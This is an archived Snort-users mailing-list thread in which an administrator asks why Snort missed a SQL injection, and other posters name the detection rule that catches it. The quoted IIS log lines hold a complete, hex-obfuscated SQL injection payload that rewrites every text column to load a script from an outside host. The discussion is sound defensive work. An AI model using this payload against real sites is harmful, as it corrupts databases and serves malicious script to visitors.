Re: [Snort-users] Undetected SQL Injection
This is a discussion on Re: [Snort-users] Undetected SQL Injection within the Snort forums, part of the System Security and Security Related category; Hi, I assume Joel is referring to good old 1:13791. SQL oversized cast statement - possible sql injection obfuscation -Leon ...
|
|||||||
| FAQ | Members List | Calendar | Search | Today's Posts | Mark Forums Read |
06-24-2008
|
|||
|
|||
Re: [Snort-users] Undetected SQL Injection
Hi, I assume Joel is referring to good old 1:13791.
SQL oversized cast statement - possible sql injection obfuscation -Leon On 24 Jun 2008, at 09:07, Patrik Nordlén wrote: > Which rule is that? > > /Patrik > > On Monday 23 June 2008 22.18.25 Joel Esler wrote: >> There is a rule that will catch these in the most recent SQL.rules >> file. >> >> -- >> Joel Esler >> Sent from my iPhone >> >> On Jun 23, 2008, at 3:15 PM, Curtis LaMasters >> >> <curtislamasters@gmail.com> wrote: >>> I am running Snort 2.7 on my firewalls and have still somehow been >>> SQL injected. I have the SQL rules, MySQL rules, IIS Rules, and a >>> few more but it sill did not detect. Below I have part of the IIS >>> log where the injection (attempt) was done. I was hopeing someone >>> could shed some light on the problem. Please let me know if I need >>> to provide any additional information. >>> >>> 2008-06-23 00:30:44 10.99.4.44 GET /com/store/content.asp >>> ContentID=10;DECLARE%20@S%20VARCHAR(4000);SET%20@S =CAST >>> (0x4445434C415245204054205641524348415228323535292 C4043205641524348415 >>> 22832353529204445434C415245205461626C655F437572736 F7220435552534F5220464F >>> 522053454C45435420612E6E616D652C622E6E616D65204652 4F4D207379736F626A656374 >>> 7320612C737973636F6C756D6E73206220574845524520612E 69643D622E696420414E4420 >>> 612E78747970653D27752720414E442028622E78747970653D 3939204F5220622E78747970 >>> 653D3335204F5220622E78747970653D323331204F5220622E 78747970653D31363729204F >>> 50454E205461626C655F437572736F72204645544348204E45 58542046524F4D205461626C >>> 655F437572736F7220494E544F2040542C4043205748494C45 28404046455443485F535441 >>> 5455533D302920424547494E20455845432827555044415445 205B272B40542B275D205345 >>> 54205B272B40432B275D3D525452494D28434F4E5645525428 564152434841522834303030 >>> 292C5B272B40432B275D29292B27273C736372697074207372 633D687474703A2F2F777777 >>> 2E626E726164772E636F6D2F622E6A733E3C2F736372697074 3E2727272920464554434820 >>> 4E4558542046524F4D20546655F437572736F7220494E544F2 040542C404320454E4420434 >>> C4F5345205461626C655F437572736F72204445414C4C4F434 15445205461626C655F43757 >>> 2736F7220% 20AS%20VARCHAR(4000));EXEC(@S);--|21|800a0d5d| >>> Application_uses_a_value_of_the_wrong_type_for_the _current_operation >>> . >>> 80 - 201.208.89.82 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT >>> +5.1;+.NET+CLR+2.0.50727) 500 0 0 >>> >>> 2008-06-23 01:23:24 10.99.4.44 GET /com/store/com_viewItem.asp >>> idProduct=9;DECLARE%20@S%20VARCHAR(4000);SET%20@S= CAST >>> (0x4445434C415245204054205641524348415228323535292 C4043205641524348415 >>> 22832353529204445434C415245205461626C655F437572736 F7220435552534F5220464F >>> 522053454C45435420612E6E616D652C622E6E616D65204652 4F4D207379736F626A656374 >>> 7320612C737973636F6C756D6E73206220574845524520612E 69643D622E696420414E4420 >>> 612E78747970653D27752720414E442028622E78747970653D 3939204F5220622E78747970 >>> 653D3335204F5220622E78747970653D323331204F5220622E 78747970653D31363729204F >>> 50454E205461626C655F437572736F72204645544348204E45 58542046524F4D205461626C >>> 655F437572736F7220494E544F2040542C4043205748494C45 28404046455443485F535441 >>> 5455533D302920424547494E20455845432827555044415445 205B272B40542B275D205345 >>> 54205B272B40432B275D3D525452494D28434F4E5645525428 564152434841522834303030 >>> 292C5B272B40432B275D29292B27273C736372697074207372 633D687474703A2F2F777777 >>> 2E70696E676164772E636F6D2F622E6A733E3C2F7363726970 743E27272729204645544348 >>> 204E4558542046524F4D205461626C655F437572736F722049 4E544F2040542C404320454E >>> 4420434C4F5345205461626C655F437572736F72204445414C 4C4F43415445205461626C65 >>> 5F437572736F7220% 20AS%20VARCHAR(4000));EXEC(@S);-- 80 - >>> 59.178.127.68 >>> Mozilla/4.0+ (compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR >>> +2.0.50727) >>> 302 0 0 >>> >>> Curtis LaMasters >>> http://www.curtis-lamasters.com >>> http://www.builtnetworks.com >>> --- >>> ---------------------------------------------------------------------- >>> Check out the new SourceForge.net Marketplace. >>> It's the best place to buy or sell services for >>> just about anything Open Source. >>> http://sourceforge.net/services/buy/index.php >>> _______________________________________________ >>> Snort-users mailing list >>> Snort-users@lists.sourceforge.net >>> Go to this URL to change user options or unsubscribe: >>> https://lists.sourceforge.net/lists/...fo/snort-users >>> Snort-users list archive: >>> http://www.geocrawler.com/redir-sf.p...st=snort-users > > > ------------------------------------------------------------------------- > Check out the new SourceForge.net Marketplace. > It's the best place to buy or sell services for > just about anything Open Source. > http://sourceforge.net/services/buy/...______________ > Snort-users mailing list > Snort-users@lists.sourceforge.net > Go to this URL to change user options or unsubscribe: > https://lists.sourceforge.net/lists/...fo/snort-users > Snort-users list archive: > http://www.geocrawler.com/redir-sf.p...st=snort-users ------------------------------------------------------------------------- Check out the new SourceForge.net Marketplace. It's the best place to buy or sell services for just about anything Open Source. http://sourceforge.net/services/buy/index.php _______________________________________________ Snort-users mailing list Snort-users@lists.sourceforge.net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/...fo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.p...st=snort-users 
|
Linear Mode
